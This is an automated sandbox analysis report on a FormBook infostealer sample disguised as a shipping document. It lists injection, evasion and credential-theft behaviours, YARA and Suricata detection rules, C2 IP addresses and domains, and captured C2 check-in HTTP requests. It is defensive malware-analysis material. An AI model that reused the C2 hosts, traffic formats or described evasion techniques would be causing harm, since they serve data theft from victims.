Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SHIPPING DOC MBL+HBL.exe

Overview

General Information

Sample name:SHIPPING DOC MBL+HBL.exe
Analysis ID:1511196
MD5:e57f3cdd911cbaf924bf1e6e7dcc7795
SHA1:eba646965b6549a2cc716c20f128d989cd192f50
SHA256:61b3a4a9ae0b5189dd42a97b9c680e3787d9d3da3b481701e5795d16480141b1
Tags:exeFormbookShipping
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SHIPPING DOC MBL+HBL.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe" MD5: E57F3CDD911CBAF924BF1E6E7DCC7795)
    • svchost.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • PrWIbKXhdqUKk.exe (PID: 3604 cmdline: "C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7704 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • PrWIbKXhdqUKk.exe (PID: 3272 cmdline: "C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7940 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe, ParentProcessId: 7308, ParentProcessName: SHIPPING DOC MBL+HBL.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", ProcessId: 7324, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe, ParentProcessId: 7308, ParentProcessName: SHIPPING DOC MBL+HBL.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", ProcessId: 7324, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-14T11:11:12.968205+020028554651A Network Trojan was detected192.168.2.4497373.33.130.19080TCP
            2024-09-14T11:11:37.124367+020028554651A Network Trojan was detected192.168.2.44974118.139.62.22680TCP
            2024-09-14T11:11:50.612929+020028554651A Network Trojan was detected192.168.2.44974566.81.203.1080TCP
            2024-09-14T11:12:04.990794+020028554651A Network Trojan was detected192.168.2.449749103.42.108.4680TCP
            2024-09-14T11:12:18.771437+020028554651A Network Trojan was detected192.168.2.4497533.33.130.19080TCP
            2024-09-14T11:12:40.145807+020028554651A Network Trojan was detected192.168.2.449757199.59.243.22680TCP
            2024-09-14T11:12:53.457606+020028554651A Network Trojan was detected192.168.2.449761162.0.239.14180TCP
            2024-09-14T11:13:14.891931+020028554651A Network Trojan was detected192.168.2.44976584.32.84.3280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-14T11:11:29.516502+020028554641A Network Trojan was detected192.168.2.44973818.139.62.22680TCP
            2024-09-14T11:11:32.059029+020028554641A Network Trojan was detected192.168.2.44973918.139.62.22680TCP
            2024-09-14T11:11:34.612983+020028554641A Network Trojan was detected192.168.2.44974018.139.62.22680TCP
            2024-09-14T11:11:42.992237+020028554641A Network Trojan was detected192.168.2.44974266.81.203.1080TCP
            2024-09-14T11:11:45.518035+020028554641A Network Trojan was detected192.168.2.44974366.81.203.1080TCP
            2024-09-14T11:11:48.128716+020028554641A Network Trojan was detected192.168.2.44974466.81.203.1080TCP
            2024-09-14T11:11:57.285087+020028554641A Network Trojan was detected192.168.2.449746103.42.108.4680TCP
            2024-09-14T11:11:59.884516+020028554641A Network Trojan was detected192.168.2.449747103.42.108.4680TCP
            2024-09-14T11:12:02.431525+020028554641A Network Trojan was detected192.168.2.449748103.42.108.4680TCP
            2024-09-14T11:12:11.113126+020028554641A Network Trojan was detected192.168.2.4497503.33.130.19080TCP
            2024-09-14T11:12:14.599655+020028554641A Network Trojan was detected192.168.2.4497513.33.130.19080TCP
            2024-09-14T11:12:16.217823+020028554641A Network Trojan was detected192.168.2.4497523.33.130.19080TCP
            2024-09-14T11:12:32.486159+020028554641A Network Trojan was detected192.168.2.449754199.59.243.22680TCP
            2024-09-14T11:12:35.042182+020028554641A Network Trojan was detected192.168.2.449755199.59.243.22680TCP
            2024-09-14T11:12:37.822272+020028554641A Network Trojan was detected192.168.2.449756199.59.243.22680TCP
            2024-09-14T11:12:45.819857+020028554641A Network Trojan was detected192.168.2.449758162.0.239.14180TCP
            2024-09-14T11:12:48.348923+020028554641A Network Trojan was detected192.168.2.449759162.0.239.14180TCP
            2024-09-14T11:12:50.939526+020028554641A Network Trojan was detected192.168.2.449760162.0.239.14180TCP
            2024-09-14T11:13:07.153462+020028554641A Network Trojan was detected192.168.2.44976284.32.84.3280TCP
            2024-09-14T11:13:09.671094+020028554641A Network Trojan was detected192.168.2.44976384.32.84.3280TCP
            2024-09-14T11:13:12.239819+020028554641A Network Trojan was detected192.168.2.44976484.32.84.3280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: SHIPPING DOC MBL+HBL.exeReversingLabs: Detection: 63%
            Source: SHIPPING DOC MBL+HBL.exeVirustotal: Detection: 35%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: SHIPPING DOC MBL+HBL.exeJoe Sandbox ML: detected
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047243039.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3566947457.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709765778.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708441812.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2030952866.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2029045752.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2127849653.000000000348F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2133475668.0000000003633000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.000000000397E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709765778.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708441812.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2131532492.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2030952866.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2029045752.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2127849653.000000000348F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2133475668.0000000003633000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.000000000397E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.2094708675.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2130361226.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000003.2064852940.00000000010BB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.2094708675.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2130361226.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000003.2064852940.00000000010BB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E6449B
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E6C7E8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6C75D FindFirstFileW,FindClose,0_2_00E6C75D
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F021
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F17E
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6F47F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E63833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63833
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E63B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63B56
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6BD48

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 84.32.84.32:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.personal-loans-jp8.xyz
            Source: DNS query: www.quantumnests.xyz
            Source: DNS query: www.siyue.xyz
            Source: Joe Sandbox ViewIP Address: 18.139.62.226 18.139.62.226
            Source: Joe Sandbox ViewIP Address: 162.0.239.141 162.0.239.141
            Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E72404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E72404
            Source: global trafficHTTP traffic detected: GET /gqyt/?gd=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.chamadaslotgiris.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /osde/?gd=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.mediaplug.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /yl6y/?gd=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.independent200.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /06rp/?gd=ziZdrN3wZJ2qpMxAfrlPkqpeB+M36+P6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYcz8nolH3weaQT2LRQ2gsiM78APZpluIu/QY=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.tigre777gg.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
